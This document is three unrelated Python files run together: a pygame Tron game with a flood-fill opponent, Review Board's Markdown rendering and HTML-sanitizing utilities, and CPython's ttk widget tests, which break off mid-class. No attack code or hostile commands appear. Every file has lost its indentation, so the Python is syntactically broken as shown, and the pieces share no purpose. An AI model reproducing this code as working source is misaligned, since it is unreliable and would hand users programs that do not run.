# on these variables so that they can be changed
# and still work at any time, will do more testing on this later
game_width = 1024
game_height = 850
board_width = 960
board_height = 720
board_x = 32
board_y = 100
game_speed = 100
block_width = 64
block_height = 48
fill_limit = 750
#user_start_x = 40 * 15 + board_x
#user_start_y = 23 * 15 + board_y
#user_dir = 1
user_start_x = 56 * 15 + board_x
user_start_y = 24 * 15 + board_y
user_dir = 3
user_image = 'tron.png'
user_color = LIGHTBLUE
user_brick = 'brick.png'
enemy1_start_x = 7 * 15 + board_x
enemy1_start_y = 24 * 15 + board_y
enemy1_dir = 1
enemy1_image = 'cp.png'
enemy1_color = RED
enemy1_brick = 'brick2.png'
# Some more initialization stuff
font = pygame.font.Font(None, 36)
size = (game_width, game_height)
screen = pygame.display.set_mode(size)
pygame.display.set_caption("PYTRON")
clock = pygame.time.Clock()
move = pygame.USEREVENT + 1
pygame.time.set_timer(move, game_speed)
def draw_board():
# This just draws the grid lines that make up the board
for k in range(0, block_width + 1):
pygame.draw.line(screen, GREEN, (board_x - 1 + (k * 15), board_y - 1),
(31 + (k * 15), board_height + board_y - 1), 2)
for k in range(0, block_height + 1):
pygame.draw.line(screen, GREEN, (board_x - 1, board_y - 1 + (k * 15)),
(board_width + board_x - 1, board_y - 1 + (k * 15)), 2)
class Graph(object):
# The graph is a dict where the key is a tuple of coordinates and the values are the
# active neighbor coordinates in the form of a tuple
def __init__(self):
self.graph_dict = {}
self.future_graph = {}
self.generate_new_graph()
def generate_new_graph(cls):
# This will generate the graph of coordinates
graph_dict = {}
for row in range(0, block_height):
for column in range(0, block_width):
graph_dict[(row, column)] = []
if row + 1 < block_height:
graph_dict[(row, column)].append((row + 1, column))
if row - 1 >= 0:
graph_dict[(row, column)].append((row - 1, column))
if column + 1 < block_width:
graph_dict[(row, column)].append((row, column + 1))
if column - 1 >= 0:
graph_dict[(row, column)].append((row, column - 1))
cls.graph_dict = graph_dict
def get_path_size(cls, x, y):
# This is the floodfill at work
if ((x, y)) in cls.future_graph:
# If the coordinate is in the dict, as in if it isn't a driver wall
# Then it runs, otherwise it returns 0
path = set()
checked = []
path.add((x, y))
checked.append((x, y))
# Instead of recursion, I just continually add things to the queue and then pop them as I go
while checked:
coord = checked.pop()
for element in cls.future_graph[coord]:
# I use a set and check the set because checking if it's in a set is constant time
# This also prevents me from adding the same coordinates infinite times
if element not in path:
path.add(element)
checked.append(element)
return len(path)
return 0
def copy_graph(cls):
cls.future_graph = copy.deepcopy(cls.graph_dict)
def print_graph(cls):
# This was an invaluable tool when making the future_graph to visibly see it
arrayify = [[0 for x in range(0, block_width)] for y in range(0, block_height)]
for i in range(0, block_width):
for j in range(0, block_height):
if (j, i) in cls.future_graph:
arrayify[j][i] = 1
for row in arrayify:
print row
print
arrayify = [[0 for x in range(0, block_width)] for y in range(0, block_height)]
for i in range(0, block_width):
for j in range(0, block_height):
if (j, i) in cls.graph_dict:
arrayify[j][i] = 1
for row in arrayify:
print row
def remove_node(cls, x, y):
# First it checks all its neighbors (keys) and removes the edges to itself (values)
# Then it removes itself (key) from the graph
for coord in cls.graph_dict[(x, y)]:
cls.graph_dict[coord].remove((x, y))
cls.graph_dict.pop((x, y), None)
def remove_future_node(cls, x, y):
if (x, y) in cls.future_graph:
for coord in cls.future_graph[(x, y)]:
cls.future_graph[coord].remove((x, y))
return cls.future_graph.pop((x, y), None)
else:
return False
def remove_next_moves(cls, apart, x, y):
current_x = x
current_y = y
path = set()
checked = []
path.add((x, y))
checked.append((x, y))
while checked:
coord = checked.pop()
if coord in cls.future_graph:
if (abs(coord[0] - current_x) + abs(coord[1] - current_y)) < apart:
for element in cls.future_graph[coord]:
if element not in path:
path.add(element)
checked.append(element)
while path:
coord = path.pop()
cls.remove_future_node(coord[0], coord[1])
class Overseer(object):
# Maintains score, reset, stuff like that
# TODO Implement score
def __init__(self):
self.user_score = 0
self.cp_score = 0
class Brick(object):
# Brick class for both user and CP bricks
def __init__(self, x, y, outline_color, image):
self.image = pygame.image.load(image).convert()
self.outline_color = outline_color
self.rect = self.image.get_rect()
self.rect.left = x
self.rect.top = y
self.top = False
self.right = False
self.bottom = False
self.left = False
def update_draw(cls):
# Determines if a line for an outline needs to be drawn and draws it
# This section is what makes the driver's tail stick together
screen.blit(cls.image, cls.rect)
if cls.top is False:
pygame.draw.line(screen, cls.outline_color, (cls.rect.left, cls.rect.top),
(cls.rect.left + 14, cls.rect.top), 1)
if cls.right is False:
pygame.draw.line(screen, cls.outline_color, (cls.rect.left + 14, cls.rect.top),
(cls.rect.left + 14, cls.rect.top + 14), 1)
if cls.bottom is False:
pygame.draw.line(screen, cls.outline_color, (cls.rect.left, cls.rect.top + 14),
(cls.rect.left + 14, cls.rect.top + 14), 1)
if cls.left is False:
pygame.draw.line(screen, cls.outline_color, (cls.rect.left, cls.rect.top),
(cls.rect.left, cls.rect.top + 14), 1)
class Driver(object):
# Driver class for both user and enemies
def __init__(self, x, y, direction, image, color, brickimage):
self.image = pygame.image.load(image).convert()
self.rect = self.image.get_rect()
self.rotated = False
self.rect.left = x
self.rect.top = y
self.dir = direction
self.color = color
self.brickimage = brickimage
self.driver_trail = []
def update_draw(cls):
screen.blit(cls.image, cls.rect)
# These will rotate the image to face the correct way and change the direction as well
def up(cls):
if cls.dir == 1:
cls.image = pygame.transform.rotate(cls.image, 90)
elif cls.dir == 3:
cls.image = pygame.transform.rotate(cls.image, 270)
cls.dir = 0
def right(cls):
if cls.dir == 0:
cls.image = pygame.transform.rotate(cls.image, 270)
elif cls.dir == 2:
cls.image = pygame.transform.rotate(cls.image, 90)
cls.dir = 1
def down(cls):
if cls.dir == 1:
cls.image = pygame.transform.rotate(cls.image, 270)
elif cls.dir == 3:
cls.image = pygame.transform.rotate(cls.image, 90)
cls.dir = 2
def left(cls):
if cls.dir == 0:
cls.image = pygame.transform.rotate(cls.image, 90)
elif cls.dir == 2:
cls.image = pygame.transform.rotate(cls.image, 270)
cls.dir = 3
def move(cls):
# Just moves the little rectangle around
if cls.dir == 0:
cls.rect.top = cls.rect.top - 15
elif cls.dir == 1:
cls.rect.left = cls.rect.left + 15
elif cls.dir == 2:
cls.rect.top = cls.rect.top + 15
elif cls.dir == 3:
cls.rect.left = cls.rect.left - 15
def reset(cls, x, y, direction, image):
# Resets the driver, used after crashes and the like
cls.image = pygame.image.load(image).convert()
cls.rect = cls.image.get_rect()
cls.rotated = False
cls.rect.left = x
cls.rect.top = y
cls.dir = direction
def getNewBoard():
# This gets you a brand new board on reset and initial start
board = [[0 for k in range(0, block_width + 2)] for j in range(0, block_height + 2)]
for i in range(0, block_width + 2):
board[0][i] = 2
board[block_height + 1][i] = 2
for i in range(0, block_height + 1):
board[i][0] = 2
board[i][block_width + 1] = 2
return board
def reset(drivers, overseer):
# Reset function for crashes and the like
drivers[0].reset(user_start_x, user_start_y, user_dir, user_image)
drivers[1].reset(enemy1_start_x, enemy1_start_y, enemy1_dir, enemy1_image)
for driver in drivers:
del driver.driver_trail[:]
def normalize_x(x):
# This gets an x pixel value and finds its corresponding value in the array
return ((x - board_x) / 15)
def normalize_y(y):
# This gets a y pixel value and finds its corresponding value in the array
return ((y - board_y) / 15)
def makeBrick(driver):
# This adds the tail behind the driver
# Every time, it checks this brick with its neighbors' bricks
# In order to update them to say they now have a block side or not
# This is where the logic comes in for making the driver's tail stick together
new_brick = Brick(driver.rect.left, driver.rect.top, driver.color, driver.brickimage)
driver_trail = driver.driver_trail
for ibrick in driver_trail:
ibrick.update_draw()
if new_brick.rect.top == ibrick.rect.top:
if new_brick.rect.left == ibrick.rect.left - 15:
new_brick.right = True
ibrick.left = True
if new_brick.rect.left == ibrick.rect.left + 15:
new_brick.left = True
ibrick.right = True
if new_brick.rect.left == ibrick.rect.left:
if new_brick.rect.top == ibrick.rect.top - 15:
new_brick.bottom = True
ibrick.top = True
if new_brick.rect.top == ibrick.rect.top + 15:
new_brick.top = True
ibrick.bottom = True
# After checking if the new brick is touching any others, it adds it to the tail
driver_trail.append(new_brick)
# It also returns its normalized location to remove it from the graph
return normalize_x(new_brick.rect.left), normalize_y(new_brick.rect.top)
def update_board(drivers, overseer, g):
# Start with a clear screen
screen.fill(BLACK)
draw_board()
driver_block_x = 0
driver_block_y = 0
for driver in drivers:
wall_up, wall_right, wall_down, wall_left = (False,) * 4
# Checks if the drivers hit each other, it will score as a tie
for driver2 in drivers:
if driver2 != driver:
if pygame.sprite.collide_rect(driver, driver2):
return False
# Gets its normalized location for the graph
update_driver_y = normalize_y(driver.rect.top)
update_driver_x = normalize_x(driver.rect.left)
# If the node has been removed (meaning it's a wall)
# Then the driver crashes and the game resets
if (update_driver_y, update_driver_x) not in g.graph_dict:
return False
# Adds the brick
added_brick_x, added_brick_y = makeBrick(driver)
if driver != drivers[0]:
g.remove_node(added_brick_y, added_brick_x)
else:
driver_block_y = added_brick_y
driver_block_x = added_brick_x
# If the driver isn't the user, then add some ai
if drivers[0] != driver:
g.copy_graph()
free_path = True
user_x = normalize_x(drivers[0].rect.left)
user_y = normalize_y(drivers[0].rect.top)
apart = ((abs(user_x - update_driver_x) + abs(user_y - update_driver_y)) / 2)
if (user_x - update_driver_x) != 0 and (user_y - update_driver_y) != 0:
apart += 4
# Almost too hard to explain this part in comments but basically
# this is what makes the imaginary wall in front of the driver
# the reason that it checks if the driver is close is to fix a specific
# use case that will be too hard to explain in comments
g.remove_next_moves(apart, user_y, user_x)
# Checks which sides have walls on them
if (update_driver_y - 1, update_driver_x) not in g.future_graph:
wall_up = True
if (update_driver_y, update_driver_x + 1) not in g.future_graph:
wall_right = True
if (update_driver_y + 1, update_driver_x) not in g.future_graph:
wall_down = True
if (update_driver_y, update_driver_x - 1) not in g.future_graph:
wall_left = True
# The flood variables initialized
flood_up, flood_right, flood_down, flood_left = (0,)*4
# Checks how many open spaces are on each side of the driver
if not wall_up:
flood_up = g.get_path_size(update_driver_y - 1, update_driver_x)
if not wall_right:
flood_right = g.get_path_size(update_driver_y, update_driver_x + 1)
if not wall_down:
flood_down = g.get_path_size(update_driver_y + 1, update_driver_x)
if not wall_left:
flood_left = g.get_path_size(update_driver_y, update_driver_x - 1)
# Finds the most efficient turn and walls up the other sides
if flood_up > flood_right and flood_up > flood_left:
wall_left = True
wall_right = True
if flood_up > flood_down:
wall_down = True
if flood_down > flood_right and flood_down > flood_left:
wall_left = True
wall_right = True
if flood_down > flood_up:
wall_up = True
if flood_left > flood_down and flood_left > flood_up:
wall_up = True
wall_down = True
if flood_left > flood_right:
wall_right = True
if flood_right > flood_down and flood_right > flood_up:
wall_up = True
wall_down = True
if flood_right > flood_left:
wall_left = True
# Moves the enemy drivers
if wall_up and driver.dir == 0:
flooding = "{}, {}, {}, {}".format(flood_up, flood_right, flood_down, flood_left)
print flooding
if wall_left:
print "upleft"
driver.right()
elif wall_right:
print "upright"
driver.left()
else:
print "up"
if bool(random.getrandbits(1)):
driver.right()
else:
driver.left()
if wall_right and driver.dir == 1:
flooding = "{}, {}, {}, {}".format(flood_up, flood_right, flood_down, flood_left)
print flooding
if wall_up:
print "rightup"
driver.down()
elif wall_down:
print "rightdown"
driver.up()
else:
print "right"
if bool(random.getrandbits(1)):
driver.down()
else:
driver.up()
if wall_down and driver.dir == 2:
flooding = "{}, {}, {}, {}".format(flood_up, flood_right, flood_down, flood_left)
print flooding
if wall_left:
print "downleft"
driver.right()
elif wall_right:
print "downright"
driver.left()
else:
print "down"
if bool(random.getrandbits(1)):
driver.right()
else:
driver.left()
if wall_left and driver.dir == 3:
flooding = "{}, {}, {}, {}".format(flood_up, flood_right, flood_down, flood_left)
print flooding
if wall_up:
print "leftup"
driver.down()
elif wall_down:
print "leftdown"
driver.up()
else:
print "left"
if bool(random.getrandbits(1)):
driver.down()
else:
driver.up()
driver.update_draw()
g.remove_node(driver_block_y, driver_block_x)
pygame.display.flip()
return True
def keyCheck(key_pressed, user):
# This checks if a key has been pressed
# It then adds the required function to a queue
# When the timing of the clock is right, it pops the next move off
if key_pressed == 273 and user.dir != 2:
return user.up
if key_pressed == 275 and user.dir != 3:
return user.right
if key_pressed == 274 and user.dir != 0:
return user.down
if key_pressed == 276 and user.dir != 1:
return user.left
def main():
# Initialize user and game
user = Driver(user_start_x, user_start_y, user_dir, user_image, user_color, user_brick)
enemy1 = Driver(enemy1_start_x, enemy1_start_y, enemy1_dir, enemy1_image, enemy1_color, enemy1_brick)
drivers = []
gameOn = True
overseer = Overseer()
# Initiate drivers
drivers.append(user)
drivers.append(enemy1)
# Make graph of board
g = Graph()
# Allows you to press keys in sequence faster than the game ticks
# So that it will pop the next command when needed
keys_pressed = []
while gameOn:
clock.tick(50)
# The actual while loop that runs the game
for event in pygame.event.get():
if event.type == pygame.QUIT:
gameOn = False
if event.type == pygame.KEYDOWN:
key_checked = keyCheck(event.key, user)
if key_checked:
keys_pressed.insert(0, key_checked)
if event.type == move:
# If there are any keys added to the queue, it pops them and then runs them
if keys_pressed:
keys_pressed.pop()()
for driver in drivers:
driver.move()
if not update_board(drivers, overseer, g):
reset(drivers, overseer)
g.generate_new_graph()
keys_pressed = []
pygame.quit()
if __name__ == "__main__":
main()
|
chipx86/reviewboard | refs/heads/master | reviewboard/reviews/markdown_utils.py | 1 | from __future__ import unicode_literals
import warnings
import pymdownx.emoji
from bleach.sanitizer import Cleaner
from django.core.exceptions import ObjectDoesNotExist
from django.db.models import Model
from django.utils.encoding import force_text
from django.utils.html import escape
from djblets import markdown as djblets_markdown
from djblets.siteconfig.models import SiteConfiguration
from markdown import markdown
# Keyword arguments used when calling a Markdown renderer function.
#
# We use XHTML1 instead of HTML5 to ensure the results can be parsed by an
# XML parser, needed for change descriptions and other parts of the web UI.
MARKDOWN_KWARGS = {
'enable_attributes': False,
'output_format': 'xhtml1',
'lazy_ol': False,
'extensions': [
'markdown.extensions.fenced_code',
'markdown.extensions.codehilite',
'markdown.extensions.sane_lists',
'markdown.extensions.tables',
'markdown.extensions.nl2br',
'pymdownx.tilde',
'pymdownx.emoji',
'djblets.markdown.extensions.escape_html',
'djblets.markdown.extensions.wysiwyg',
],
'extension_configs': {
'markdown.extensions.codehilite': {
'guess_lang': False,
},
'pymdownx.emoji': {
'emoji_index': pymdownx.emoji.gemoji,
'options': {
'classes': 'emoji',
'image_path': ('https://github.githubassets.com/images/icons/'
'emoji/unicode/'),
'non_standard_image_path': ('https://github.githubassets.com/'
'images/icons/emoji/'),
},
},
},
}
#: A list of HTML tags considered to be safe in Markdown-generated output.
#:
#: Anything not in this list will be escaped when sanitizing the resulting
#: HTML.
#:
#: Version Added:
#: 3.0.22
SAFE_MARKDOWN_TAGS = [
'a',
'b',
'blockquote',
'br',
'code',
'dd',
'del',
'div',
'dt',
'em',
'h1',
'h2',
'h3',
'h4',
'h5',
'h6',
'hr',
'i',
'img',
'li',
'ol',
'p',
'pre',
'span',
'strong',
'sub',
'sup',
'table',
'tbody',
'td',
'foot',
'th',
'thead',
'tr',
'tt',
'ul',
]
#: Mappings of HTML tags to attributes considered to be safe for Markdown.
#:
#: Anything not in this list will be removed ehen sanitizing the resulting
#: HTML.
#:
#: Version Added:
#: 3.0.22
SAFE_MARKDOWN_ATTRS = {
'*': ['class', 'id'],
'a': ['href', 'alt', 'title'],
'img': ['src', 'alt', 'title'],
}
def markdown_escape_field(obj, field_name):
"""Escapes Markdown text in a model or dictionary's field.
This is a convenience around markdown_escape to escape the contents of
a particular field in a model or dictionary.
"""
if isinstance(obj, Model):
setattr(obj, field_name,
djblets_markdown.markdown_escape(getattr(obj, field_name)))
elif isinstance(obj, dict):
obj[field_name] = djblets_markdown.markdown_escape(obj[field_name])
else:
raise TypeError('Unexpected type %r passed to markdown_escape_field'
% obj)
def markdown_unescape_field(obj, field_name):
"""Unescapes Markdown text in a model or dictionary's field.
This is a convenience around markdown_unescape to unescape the contents of
a particular field in a model or dictionary.
"""
if isinstance(obj, Model):
setattr(obj, field_name,
djblets_markdown.markdown_unescape(getattr(obj, field_name)))
elif isinstance(obj, dict):
obj[field_name] = djblets_markdown.markdown_unescape(obj[field_name])
else:
raise TypeError('Unexpected type %r passed to markdown_unescape_field'
% obj)
def normalize_text_for_edit(user, text, rich_text, escape_html=True):
"""Normalizes text, converting it for editing.
This will normalize text for editing based on the rich_text flag and
the user settings.
If the text is not in Markdown and the user edits in Markdown by default,
this will return the text escaped for edit. Otherwise, the text is
returned as-is.
"""
if text is None:
return ''
if not rich_text and is_rich_text_default_for_user(user):
# This isn't rich text, but it's going to be edited as rich text,
# so escape it.
text = djblets_markdown.markdown_escape(text)
if escape_html:
text = escape(text)
return text
def markdown_render_conditional(text, rich_text):
"""Return the escaped HTML content based on the rich_text flag."""
if rich_text:
return render_markdown(text)
else:
return escape(text)
def is_rich_text_default_for_user(user):
"""Returns whether the user edits in Markdown by default."""
if user.is_authenticated():
try:
return user.get_profile().should_use_rich_text
except ObjectDoesNotExist:
pass
siteconfig = SiteConfiguration.objects.get_current()
return siteconfig.get('default_use_rich_text')
def markdown_set_field_escaped(obj, field, escaped):
"""Escapes or unescapes the specified field in a model or dictionary."""
if escaped:
markdown_escape_field(obj, field)
else:
markdown_unescape_field(obj, field)
def render_markdown(text):
"""Render Markdown text to XHTML.
The Markdown text will be sanitized to prevent injecting custom HTML
or dangerous links. It will also enable a few plugins for code
highlighting and sane lists.
It's rendered to XHTML in order to allow the element tree to be easily
parsed for code review and change description diffing.
Args:
text (bytes or unicode):
The Markdown text to render.
If this is a byte string, it must represent UTF-8-encoded text.
Returns:
unicode:
The Markdown-rendered XHTML.
"""
html = markdown(force_text(text), **MARKDOWN_KWARGS)
# Create a bleach HTML cleaner, and override settings on the html5lib
# serializer it contains to ensure we use self-closing HTML tags, like
# <br/>. This is needed so that we can parse the resulting HTML in
# Djblets for things like Markdown diffing.
cleaner = Cleaner(tags=SAFE_MARKDOWN_TAGS,
attributes=SAFE_MARKDOWN_ATTRS)
cleaner.serializer.use_trailing_solidus = True
return cleaner.clean(html)
def render_markdown_from_file(f):
"""Renders Markdown text to HTML.
The Markdown text will be sanitized to prevent injecting custom HTML.
It will also enable a few plugins for code highlighting and sane lists.
"""
return djblets_markdown.render_markdown_from_file(f, **MARKDOWN_KWARGS)
|
michalliu/OpenWrt-Firefly-Libraries | refs/heads/master | staging_dir/target-mipsel_1004kc+dsp_uClibc-0.9.33.2/usr/lib/python3.4/tkinter/test/test_ttk/test_widgets.py | 8 | import unittest
import tkinter
from tkinter import ttk, TclError
from test.support import requires
import sys
from tkinter.test.test_ttk.test_functions import MockTclObj
from tkinter.test.support import (AbstractTkTest, tcl_version, get_tk_patchlevel,
simulate_mouse_click)
from tkinter.test.widget_tests import (add_standard_options, noconv,
AbstractWidgetTest, StandardOptionsTests, IntegerSizeTests, PixelSizeTests,
setUpModule)
requires('gui')
class StandardTtkOptionsTests(StandardOptionsTests):
def test_class(self):
widget = self.create()
self.assertEqual(widget['class'], '')
errmsg='attempt to change read-only option'
if get_tk_patchlevel() < (8, 6, 0): # actually this was changed in 8.6b3
errmsg='Attempt to change read-only option'
self.checkInvalidParam(widget, 'class', 'Foo', errmsg=errmsg)
widget2 = self.create(class_='Foo')
self.assertEqual(widget2['class'], 'Foo')
def test_padding(self):
widget = self.create()
self.checkParam(widget, 'padding', 0, expected=('0',))
self.checkParam(widget, 'padding', 5, expected=('5',))
self.checkParam(widget, 'padding', (5, 6), expected=('5', '6'))
self.checkParam(widget, 'padding', (5, 6, 7),
expected=('5', '6', '7'))
self.checkParam(widget, 'padding', (5, 6, 7, 8),
expected=('5', '6', '7', '8'))
self.checkParam(widget, 'padding', ('5p', '6p', '7p', '8p'))
self.checkParam(widget, 'padding', (), expected='')
def test_style(self):
widget = self.create()
self.assertEqual(widget['style'], '')
errmsg = 'Layout Foo not found'
if hasattr(self, 'default_orient'):
errmsg = ('Layout %s.Foo not found' %
getattr(self, 'default_orient').title())
self.checkInvalidParam(widget, 'style', 'Foo',
errmsg=errmsg)
widget2 = self.create(class_='Foo')
self.assertEqual(widget2['class'], 'Foo')
# XXX
pass
class WidgetTest(AbstractTkTest, unittest.TestCase):
"""Tests methods available in every ttk widget."""
def setUp(self):
super().setUp()
self.widget = ttk.Button(self.root, width=0, text="Text")
self.widget.pack()
self.widget.wait_visibility()
def test_identify(self):
self.widget.update_idletasks()
self.assertEqual(self.widget.identify(
int(self.widget.winfo_width() / 2),
int(self.widget.winfo_height() / 2)
), "label")
self.assertEqual(self.widget.identify(-1, -1), "")
self.assertRaises(tkinter.TclError, self.widget.identify, None, 5)
self.assertRaises(tkinter.TclError, self.widget.identify, 5, None)
self.assertRaises(tkinter.TclError, self.widget.identify, 5, '')
def test_widget_state(self):
# XXX not sure about the portability of all these tests
self.assertEqual(self.widget.state(), ())
self.assertEqual(self.widget.instate(['!disabled']), True)
# changing from !disabled to disabled
self.assertEqual(self.widget.state(['disabled']), ('!disabled', ))
# no state change
self.assertEqual(self.widget.state(['disabled']), ())
# change back to !disable but also active
self.assertEqual(self.widget.state(['!disabled', 'active']),
('!active', 'disabled'))
# no state changes, again
self.assertEqual(self.widget.state(['!disabled', 'active']), ())
self.assertEqual(self.widget.state(['active', '!disabled']), ())
def test_cb(arg1, **kw):
return arg1, kw
self.assertEqual(self.widget.instate(['!disabled'],
test_cb, "hi", **{"msg": "there"}),
('hi', {'msg': 'there'}))
# attempt to set invalid statespec
currstate = self.widget.state()
self.assertRaises(tkinter.TclError, self.widget.instate,
['badstate'])
self.assertRaises(tkinter.TclError, self.widget.instate,
['disabled', 'badstate'])
# verify that widget didn't change its state
self.assertEqual(currstate, self.widget.state())
# ensuring that passing None as state doesn't modify current state
self.widget.state(['active', '!disabled'])
self.assertEqual(self.widget.state(), ('active', ))
class AbstractToplevelTest(AbstractWidgetTest, PixelSizeTests):
_conv_pixels = noconv
@add_standard_options(StandardTtkOptionsTests)
class FrameTest(AbstractToplevelTest, unittest.TestCase):
OPTIONS = (
'borderwidth', 'class', 'cursor', 'height',
'padding', 'relief', 'style', 'takefocus',
'width',
)
def create(self, **kwargs):
return ttk.Frame(self.root, **kwargs)
@add_standard_options(StandardTtkOptionsTests)
class LabelFrameTest(AbstractToplevelTest, unittest.TestCase):
OPTIONS = (
'borderwidth', 'class', 'cursor', 'height',
'labelanchor', 'labelwidget',
'padding', 'relief', 'style', 'takefocus',
'text', 'underline', 'width',
)
def create(self, **kwargs):
return ttk.LabelFrame(self.root, **kwargs)
def test_labelanchor(self):
widget = self.create()
self.checkEnumParam(widget, 'labelanchor',
'e', 'en', 'es', 'n', 'ne', 'nw', 's', 'se', 'sw', 'w', 'wn', 'ws',
errmsg='Bad label anchor specification {}')
self.checkInvalidParam(widget, 'labelanchor', 'center')
def test_labelwidget(self):
widget = self.create()
label = ttk.Label(self.root, text='Mupp', name='foo')
self.checkParam(widget, 'labelwidget', label, expected='.foo')
label.destroy()
class AbstractLabelTest(AbstractWidgetTest):
def checkImageParam(self, widget, name):
image = tkinter.PhotoImage(master=self.root, name='image1')
image2 = tkinter.PhotoImage(master=self.root, name='image2')
self.checkParam(widget, name, image, expected=('image1',))
self.checkParam(widget, name, 'image1', expected=('image1',))
self.checkParam(widget, name, (image,), expected=('image1',))
self.checkParam(widget, name, (image, 'active', image2),
expected=('image1', 'active', 'image2'))
self.checkParam(widget, name, 'image1 active image2',
expected=('image1', 'active', 'image2'))
self.checkInvalidParam(widget, name, 'spam',
errmsg='image "spam" doesn\'t exist')
def test_compound(self):
widget = self.create()
self.checkEnumParam(widget, 'compound',
'none', 'text', 'image', 'center',
'top', 'bottom', 'left', 'right')
def test_state(self):
widget = self.create()
self.checkParams(widget, 'state', 'active', 'disabled', 'normal')
def test_width(self):
widget = self.create()
self.checkParams(widget, 'width', 402, -402, 0)
@add_standard_options(StandardTtkOptionsTests)
class LabelTest(AbstractLabelTest, unittest.TestCase):
OPTIONS = (
'anchor', 'background',
'class', 'compound', 'cursor', 'font', 'foreground',
'image', 'justify', 'padding', 'relief', 'state', 'style',
'takefocus', 'text', 'textvariable',
'underline', 'width', 'wraplength',
)
_conv_pixels = noconv
def create(self, **kwargs):
return ttk.Label(self.root, **kwargs)
def test_font(self):
widget = self.create()
self.checkParam(widget, 'font',
'-Adobe-Helvetica-Medium-R-Normal--*-120-*-*-*-*-*-*')
@add_standard_options(StandardTtkOptionsTests)
class ButtonTest(AbstractLabelTest, unittest.TestCase):
OPTIONS = (
'class', 'command', 'compound', 'cursor', 'default',
'image', 'state', 'style', 'takefocus', 'text', 'textvariable',
'underline', 'width',
)
def create(self, **kwargs):
return ttk.Button(self.root, **kwargs)
def test_default(self):
widget = self.create()
self.checkEnumParam(widget, 'default', 'normal', 'active', 'disabled')
def test_invoke(self):
success = []
btn = ttk.Button(self.root, command=lambda: success.append(1))
btn.invoke()
self.assertTrue(success)
@add_standard_options(StandardTtkOptionsTests)
class CheckbuttonTest(AbstractLabelTest, unittest.TestCase):
OPTIONS = (
'class', 'command', 'compound', 'cursor',
'image',
'offvalue', 'onvalue',
'state', 'style',
'takefocus', 'text', 'textvariable',
'underline', 'variable', 'width',
)
def create(self, **kwargs):
return ttk.Checkbutton(self.root, **kwargs)
def test_offvalue(self):
widget = self.create()
self.checkParams(widget, 'offvalue', 1, 2.3, '', 'any string')
def test_onvalue(self):
widget = self.create()
self.checkParams(widget, 'onvalue', 1, 2.3, '', 'any string')
def test_invoke(self):
success = []
def cb_test():
success.append(1)
return "cb test called"
cbtn = ttk.Checkbutton(self.root, command=cb_test)
# the variable automatically created by ttk.Checkbutton is actually
# undefined till we invoke the Checkbutton
self.assertEqual(cbtn.state(), ('alternate', ))
self.assertRaises(tkinter.TclError, cbtn.tk.globalgetvar,
cbtn['variable'])
res = cbtn.invoke()
self.assertEqual(res, "cb test called")
self.assertEqual(cbtn['onvalue'],
cbtn.tk.globalgetvar(cbtn['variable']))
self.assertTrue(success)
cbtn['command'] = ''
res = cbtn.invoke()
self.assertFalse(str(res))
self.assertLessEqual(len(success), 1)
self.assertEqual(cbtn['offvalue'],
cbtn.tk.globalgetvar(cbtn['variable']))
@add_standard_options(IntegerSizeTests, StandardTtkOptionsTests)
class ComboboxTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'cursor', 'exportselection', 'height',
'justify', 'postcommand', 'state', 'style',
'takefocus', 'textvariable', 'values', 'width',
)
def setUp(self):
super().setUp()
self.combo = self.create()
def create(self, **kwargs):
return ttk.Combobox(self.root, **kwargs)
def test_height(self):
widget = self.create()
self.checkParams(widget, 'height', 100, 101.2, 102.6, -100, 0, '1i')
def test_state(self):
widget = self.create()
self.checkParams(widget, 'state', 'active', 'disabled', 'normal')
def _show_drop_down_listbox(self):
width = self.combo.winfo_width()
self.combo.event_generate('<ButtonPress-1>', x=width - 5, y=5)
self.combo.event_generate('<ButtonRelease-1>', x=width - 5, y=5)
self.combo.update_idletasks()
def test_virtual_event(self):
success = []
self.combo['values'] = [1]
self.combo.bind('<<ComboboxSelected>>',
lambda evt: success.append(True))
self.combo.pack()
self.combo.wait_visibility()
height = self.combo.winfo_height()
self._show_drop_down_listbox()
self.combo.update()
self.combo.event_generate('<Return>')
self.combo.update()
self.assertTrue(success)
def test_postcommand(self):
success = []
self.combo['postcommand'] = lambda: success.append(True)
self.combo.pack()
self.combo.wait_visibility()
self._show_drop_down_listbox()
self.assertTrue(success)
# testing postcommand removal
self.combo['postcommand'] = ''
self._show_drop_down_listbox()
self.assertEqual(len(success), 1)
def test_values(self):
def check_get_current(getval, currval):
self.assertEqual(self.combo.get(), getval)
self.assertEqual(self.combo.current(), currval)
self.assertEqual(self.combo['values'],
() if tcl_version < (8, 5) else '')
check_get_current('', -1)
self.checkParam(self.combo, 'values', 'mon tue wed thur',
expected=('mon', 'tue', 'wed', 'thur'))
self.checkParam(self.combo, 'values', ('mon', 'tue', 'wed', 'thur'))
self.checkParam(self.combo, 'values', (42, 3.14, '', 'any string'))
self.checkParam(self.combo, 'values', '', expected=())
self.combo['values'] = ['a', 1, 'c']
self.combo.set('c')
check_get_current('c', 2)
self.combo.current(0)
check_get_current('a', 0)
self.combo.set('d')
check_get_current('d', -1)
# testing values with empty string
self.combo.set('')
self.combo['values'] = (1, 2, '', 3)
check_get_current('', 2)
# testing values with empty string set through configure
self.combo.configure(values=[1, '', 2])
self.assertEqual(self.combo['values'],
('1', '', '2') if self.wantobjects else
'1 {} 2')
# testing values with spaces
self.combo['values'] = ['a b', 'a\tb', 'a\nb']
self.assertEqual(self.combo['values'],
('a b', 'a\tb', 'a\nb') if self.wantobjects else
'{a b} {a\tb} {a\nb}')
# testing values with special characters
self.combo['values'] = [r'a\tb', '"a"', '} {']
self.assertEqual(self.combo['values'],
(r'a\tb', '"a"', '} {') if self.wantobjects else
r'a\\tb {"a"} \}\ \{')
# out of range
self.assertRaises(tkinter.TclError, self.combo.current,
len(self.combo['values']))
# it expects an integer (or something that can be converted to int)
self.assertRaises(tkinter.TclError, self.combo.current, '')
# testing creating combobox with empty string in values
combo2 = ttk.Combobox(self.root, values=[1, 2, ''])
self.assertEqual(combo2['values'],
('1', '2', '') if self.wantobjects else '1 2 {}')
combo2.destroy()
@add_standard_options(IntegerSizeTests, StandardTtkOptionsTests)
class EntryTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'background', 'class', 'cursor',
'exportselection', 'font',
'invalidcommand', 'justify',
'show', 'state', 'style', 'takefocus', 'textvariable',
'validate', 'validatecommand', 'width', 'xscrollcommand',
)
def setUp(self):
super().setUp()
self.entry = self.create()
def create(self, **kwargs):
return ttk.Entry(self.root, **kwargs)
def test_invalidcommand(self):
widget = self.create()
self.checkCommandParam(widget, 'invalidcommand')
def test_show(self):
widget = self.create()
self.checkParam(widget, 'show', '*')
